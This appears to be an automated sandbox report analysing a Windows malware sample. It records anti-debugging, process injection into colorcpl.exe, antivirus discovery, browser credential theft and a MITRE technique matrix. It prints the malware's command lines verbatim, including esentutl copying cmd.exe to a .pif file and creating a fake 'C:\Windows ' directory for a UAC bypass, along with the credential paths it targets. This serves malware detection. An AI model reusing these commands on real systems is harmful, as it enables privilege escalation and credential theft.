                Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: xpha.pif, 00000010.00000002.1713024647.0000000002590000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 00000013.00000002.1713335088.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 0000001F.00000002.1804537208.0000000000618000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
                Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
                Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\nft438A5fN.exe API call chain: ExitProcess graph end node graph_0-72744

                Anti Debugging

                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02CAF744
                Source: C:\Users\user\Desktop\nft438A5fN.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process queried: DebugPort
                Source: C:\Windows\SysWOW64\SndVol.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320F3FE LdrInitializeThunk, 11_2_0320F3FE
                Source: C:\Users\Public\alpha.pif Code function: 7_2_00062E37 IsDebuggerPresent, 7_2_00062E37
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02CA894C
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D5A8E5 mov eax, dword ptr fs:[00000030h] 0_2_02D5A8E5
                Source: C:\Users\Public\alpha.pif Code function: 7_2_0006C1FA mov eax, dword ptr fs:[00000030h] 7_2_0006C1FA
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03243355 mov eax, dword ptr fs:[00000030h] 11_2_03243355
                Source: C:\Users\Public\alpha.pif Code function: 15_2_0006C1FA mov eax, dword ptr fs:[00000030h] 15_2_0006C1FA
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EC3355 mov eax, dword ptr fs:[00000030h] 21_2_02EC3355
                Source: C:\Users\Public\alpha.pif Code function: 7_2_0004A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW, 7_2_0004A9D4
                Source: C:\Users\Public\alpha.pif Code function: 7_2_00056EC0 SetUnhandledExceptionFilter, 7_2_00056EC0
                Source: C:\Users\Public\alpha.pif Code function: 7_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00056B40
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0323503C
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0323BB71
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03234BD8 SetUnhandledExceptionFilter, 11_2_03234BD8
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03234A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_03234A8A
                Source: C:\Users\Public\alpha.pif Code function: 15_2_00056EC0 SetUnhandledExceptionFilter, 15_2_00056EC0
                Source: C:\Users\Public\alpha.pif Code function: 15_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00056B40
                Source: C:\Users\Public\xpha.pif Code function: 16_2_000F3600 SetUnhandledExceptionFilter, 16_2_000F3600
                Source: C:\Users\Public\xpha.pif Code function: 16_2_000F3470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_000F3470
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_02EB503C
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_02EB4A8A
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB4BD8 SetUnhandledExceptionFilter, 21_2_02EB4BD8
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EBBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_02EBBB71

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\nft438A5fN.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                Source: C:\Users\user\Desktop\nft438A5fN.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3200000 protect: page execute and read and write
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E80000 protect: page execute and read and write
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3290000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                Source: C:\Users\user\Desktop\nft438A5fN.exe Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_03212132
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 21_2_02E92132
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03219662 mouse_event, 11_2_03219662
                Source: C:\Users\user\Desktop\nft438A5fN.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4C246 cpuid 0_2_02D4C246
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02C95ACC
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: GetLocaleInfoA, 0_2_02C9A7C4
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: GetLocaleInfoA, 0_2_02C9A810
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02C95BD8
                Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_00048572
                Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 7_2_00046854
                Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 7_2_00049310
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_03252393
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_03252143
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_0325201B
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_032520B6
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_03252690
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_032525C3
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_032524BC
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_03248484
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 11_2_0320F90C
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_0324896D
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_03251FD0
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 11_2_03251D58
                Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 15_2_00048572
                Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 15_2_00046854
                Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 15_2_00049310
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 21_2_02ED2393
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02ED20B6
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02ED201B
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 21_2_02ED2143
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 21_2_02ED2690
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 21_2_02ED24BC
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02EC8484
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 21_2_02ED25C3
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 21_2_02EC896D
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 21_2_02E8F90C
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02ED1FD0
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 21_2_02ED1D58
                Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9920C GetLocalTime, 0_2_02C9920C
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321B69E GetUserNameW, 11_2_0321B69E
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032493E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 11_2_032493E5
                Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9B78C GetVersionExA, 0_2_02C9B78C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
                Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
                Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
                Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_0320BA4D
                Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 21_2_02E8BA4D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\21_2_02E8BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db21_2_02E8BB6B

                Remote Access Functionality

Source: Yara match | File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe | 11_2_0320569A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe | 21_2_02E8569A
MITRE ATT&CK matrix, listed per tactic. The digits in front of a technique are the badges the report attaches to observed techniques (kept verbatim); techniques without a badge are the matrix's standard placeholder entries and were not observed for this sample.

Reconnaissance: none observed (placeholders: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information)
Resource Development: none observed (placeholders: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server)
Initial Access: 1 Valid Accounts (placeholders: Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain)
Execution: 1 Native API; 1 Command and Scripting Interpreter; 2 Service Execution (placeholders: Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell)
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Windows Service; 1 Registry Run Keys / Startup Folder (placeholders: Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task)
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Valid Accounts; 11 Access Token Manipulation; 1 Windows Service; 321 Process Injection; 1 Registry Run Keys / Startup Folder (placeholders: Scheduled Task/Job, At, Cron, Launchd, Scheduled Task)
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 File Deletion; 221 Masquerading; 1 Valid Accounts; 1 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 321 Process Injection
Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files (placeholders: NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging)
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 44 System Information Discovery; 241 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 System Owner/User Discovery (placeholders: System Network Connections Discovery, Process Discovery)
Lateral Movement: none observed (placeholders: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content)
Collection: 11 Archive Collected Data; 111 Input Capture; 3 Clipboard Data (placeholders: Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture)
Command and Control: 12 Ingress Tool Transfer; 21 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol (placeholders: Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS)
Exfiltration: none observed (placeholders: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium)
Impact: 1 System Shutdown/Reboot; 1 Defacement (placeholders: Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking)

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior graph (ID 1562863; sample nft438A5fN.exe; start date 26/11/2024; architecture WINDOWS; score 100), rendered as a process tree. Bracketed numbers are the graph's created-registry-value / created-file badges as they appear on each node; "N other processes/signatures" are the graph's own collapsed nodes.

Start
  DNS/IP: drive.usercontent.google.com
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 10 other signatures
  +-- nft438A5fN.exe [1 6]
  |     DNS/IP: drive.usercontent.google.com 142.250.181.129, port 443, local ports 49705 and 49706 (GOOGLEUS, United States)
  |     Dropped: C:\Users\Public\Wuqtggvo.url (MS); C:\Users\Public\Libraries\ovggtquW.cmd (DOS); C:\Users\Public\Libraries\Wuqtggvo (OpenPGP)
  |     Signatures: Early bird code injection technique detected; Allocates memory in foreign processes; Queues an APC in another process (thread injection); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  |     +-- colorcpl.exe
  |     |     Signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
